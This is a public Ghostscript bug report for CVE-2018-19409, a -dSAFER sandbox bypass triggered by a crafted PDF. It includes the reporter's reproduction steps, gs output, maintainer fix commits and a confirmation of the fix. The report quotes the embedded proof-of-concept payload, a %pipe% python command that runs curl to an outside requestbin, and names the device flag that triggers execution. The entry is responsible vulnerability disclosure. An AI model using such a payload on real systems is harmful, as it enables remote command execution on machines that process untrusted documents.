Bug 700176 - -dSAFER bypass
Summary: -dSAFER bypass
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public) (show other bugs)
Version: unspecified
Hardware: PC Linux
: P4 critical
Assignee: Chris Liddell (chrisl)
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-11-14 02:45 UTC by Arkadiy Tetelman
Modified: 2019-05-08 13:35 UTC (History)
7 users (show)

See Also:
Customer:
Word Size: ---


Attachments
Malicious pdf (59.94 KB, application/pdf)
2018-11-14 02:45 UTC, Arkadiy Tetelman
Details
Decompressed version with a less invasive payload (801.25 KB, application/pdf)
2018-11-14 08:00 UTC, Chris Liddell (chrisl)
Details

Note You need to log in before you can comment on or make changes to this bug.
Description Arkadiy Tetelman 2018-11-14 02:45:17 UTC
Created attachment 16186 [details]
Malicious pdf

Hi,

I work at a print-and-mail company and we have received the following issue through our bug bounty program. After a lot of investigating and sleuthing we've been able to get the following minimal reproduction case, which I believe is a bug/0day in Ghostscript.

The attached pdf file contains a python payload to:
%pipe%python -c 'import subprocess;p=subprocess.call(["curl","https://request-bin-1239.herokuapp.com/xk3llsxk"])'

This makes a request to the following "requestbin" (which records and lets you inspect all requests it receives):
https://request-bin-1239.herokuapp.com/xk3llsxk?inspect

We're seeing that invoking gs with -dSAFER correctly does not execute the payload:
```
bash-4.2# gs -DSAFER /tmp/ltr_61435b3cbc5676fa.pdf
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Processing pages 1 through 1.
Page 1
false
   **** Error reading a content stream. The page may be incomplete.
               Output may be incorrect.
   **** Error: Form stream has unbalanced q/Q operators (too many q's)
               Output may be incorrect.
   **** Error reading a content stream. The page may be incomplete.
               Output may be incorrect.
   **** Error reading a content stream. The page may be incomplete.
               Output may be incorrect.
   **** Error: File did not complete the page properly and may be damaged.
               Output may be incorrect.
Error: /rangecheck in --pdfshowpage_finish--
Operand stack:
   --dict:7/15(L)--   1   false   --dict:3/3(L)--   --dict:80/90(ro)(L)--   8   --nostringval--   -1   --nostringval--
Execution stack:
   %interp_exit   .runexec2   --nostringval--   pdfshowpage_finish   --nostringval--   2   %stopped_push   --nostringval--   pdfshowpage_finish   pdfshowpage_finish   false   1   %stopped_push   2027   1   3   %oparray_pop   2026   1   3   %oparray_pop   2007   1   3   %oparray_pop   2008   1   3   %oparray_pop   pdfshowpage_finish   pdfshowpage_finish   2   1   1   pdfshowpage_finish   %for_pos_int_continue   2011   1   7   %oparray_pop   pdfshowpage_finish   pdfshowpage_finish   false   1   %stopped_push   pdfshowpage_finish
Dictionary stack:
   --dict:952/1684(ro)(G)--   --dict:1/20(G)--   --dict:83/200(L)--   --dict:83/200(L)--   --dict:133/256(ro)(G)--   --dict:311/450(ro)(G)--   --dict:33/64(L)--   --dict:6/9(L)--   --dict:6/20(L)--   --dict:1/1(ro)(G)--   --dict:1/1(ro)(G)--   --dict:1/1(ro)(G)--   --dict:1/1(ro)(G)--
Current allocation mode is local
Last OS error: No such file or directory
GPL Ghostscript GIT PRERELEASE 9.26: Unrecoverable error, exit code 1
```
i.e. running the command above will *not* make a new request appear in the linked requestbin.

However invoking the script with -dSAFER and -sDEVICE=pngalpha (or anecdotally any device besides pdfwrite) bypasses dSAFER and invokes the payload:

```
bash-4.2# gs -sDEVICE=pngalpha -DSAFER /tmp/ltr_61435b3cbc5676fa.pdf
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Processing pages 1 through 1.
Page 1
```
After invoking this command if you refresh the requestbin you will see that a new request has been made (i.e. the payload executed).


Ghostscript Version:
```
bash-4.2# /app/bin/gs -v
GPL Ghostscript GIT PRERELEASE 9.26 (2018-09-13)
```
(After the multiple RCEs by Google Project Zero and in the absence of a new ghostscript release containing the fixes, we built it ourselves off of commit 1d2a714c9ac3f5cbca0015dbfbfa2fbcb5620fbe).
Comment 1 Chris Liddell (chrisl) 2018-11-14 08:00:37 UTC
Created attachment 16187 [details]
Decompressed version with a less invasive payload
Comment 2 Chris Liddell (chrisl) 2018-11-14 10:42:22 UTC
Fixed in:
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=661e8d8fb824
Comment 3 Arkadiy Tetelman 2018-11-14 19:16:18 UTC
It doesn't seem fixed to me - we built off of 965a557 and ghostscript no longer executes your uncompressed PoC (ltr_61435b3cbc5676fa-uc.pdf) but still *does* execute our original PoC (ltr_61435b3cbc5676fa.pdf)
Comment 4 Chris Liddell (chrisl) 2018-11-14 22:13:52 UTC
(In reply to Arkadiy Tetelman from comment #3)
> It doesn't seem fixed to me - we built off of 965a557 and ghostscript no
> longer executes your uncompressed PoC (ltr_61435b3cbc5676fa-uc.pdf) but
> still *does* execute our original PoC (ltr_61435b3cbc5676fa.pdf)

Yes, the fix was incomplete - a subtlety I missed the first time around.

I have a solution, but I want to discuss it with one of my colleagues before committing it.
Comment 5 Chris Liddell (chrisl) 2018-11-15 09:06:40 UTC
The commit linked above, and then this commit:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=ea1b3ef437

fix this issue.
Comment 6 Arkadiy Tetelman 2018-11-15 21:01:29 UTC
Confirmed! Thank you for the speedy fix
Comment 7 Chris Liddell (chrisl) 2018-11-21 15:44:03 UTC
This is CVE-2018-19409